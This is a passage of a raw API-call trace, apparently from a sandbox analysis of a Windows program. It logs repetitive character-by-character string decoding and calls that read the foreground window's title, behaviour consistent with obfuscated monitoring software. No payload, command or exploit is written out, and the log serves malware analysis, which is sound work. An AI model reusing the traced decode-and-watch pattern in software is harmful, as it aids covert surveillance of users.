lpUsedDefaultChar=0x0) returned 1 [0086.208] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.208] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.209] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.209] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0086.210] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0086.210] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.210] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.211] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.211] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.211] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0086.212] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0086.212] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.213] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.213] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.213] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.213] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.214] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.214] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.215] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.215] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.215] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.215] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.216] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.216] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.216] GetForegroundWindow () returned 0x102c2 [0086.216] GetLastError () returned 0x0 [0086.217] SysStringLen (param_1=" ") returned 0xff [0086.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0086.217] SysStringLen (param_1=" ") returned 0xff [0086.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0086.217] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0086.217] GetLastError () returned 0x0 [0086.217] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0086.217] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0086.218] SysStringLen (param_1="Activ") returned 0x5 [0086.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Activ", cchWideChar=6, lpMultiByteStr=0xe570fc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Activ", lpUsedDefaultChar=0x0) returned 6 [0086.218] SetWindowTextA (hWnd=0x2036e, lpString="Activ") returned 1 [0086.218] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x15 [0086.218] GetFocus () returned 0x0 [0086.218] lstrlenA (lpString="Activ") returned 5 [0086.218] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe570fc) returned 0x1 [0086.219] IsWindow (hWnd=0x2036e) returned 1 [0086.219] IsWindow (hWnd=0x2036e) returned 1 [0086.219] IsWindow (hWnd=0x2036e) returned 1 [0086.219] IsWindow (hWnd=0x2036e) returned 1 [0086.219] GetFocus () returned 0x0 [0086.219] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0086.220] GetFocus () returned 0x0 [0086.220] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x6) returned 0x310bcd0 [0086.220] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x6, lParam=0x310bcd0) returned 0x5 [0086.220] GetFocus () returned 0x0 [0086.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activ", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0086.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activ", cbMultiByte=-1, lpWideCharStr=0xe570fc, cchWideChar=6 | out: lpWideCharStr="Activ") returned 6 [0086.220] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0086.220] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0086.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_", lpUsedDefaultChar=0x0) returned 1 [0086.221] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0086.222] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0086.222] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0086.222] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t", lpUsedDefaultChar=0x0) returned 1 [0086.223] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0086.223] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.224] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.224] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.224] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.225] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0086.225] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0086.225] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.226] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.226] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.227] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.227] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.227] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.228] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.228] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.228] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.229] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.229] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.230] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.230] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.230] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.230] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0086.231] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0086.231] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.232] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.232] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.232] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.232] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0086.233] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0086.233] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.233] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.234] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.234] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.234] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.235] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.235] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 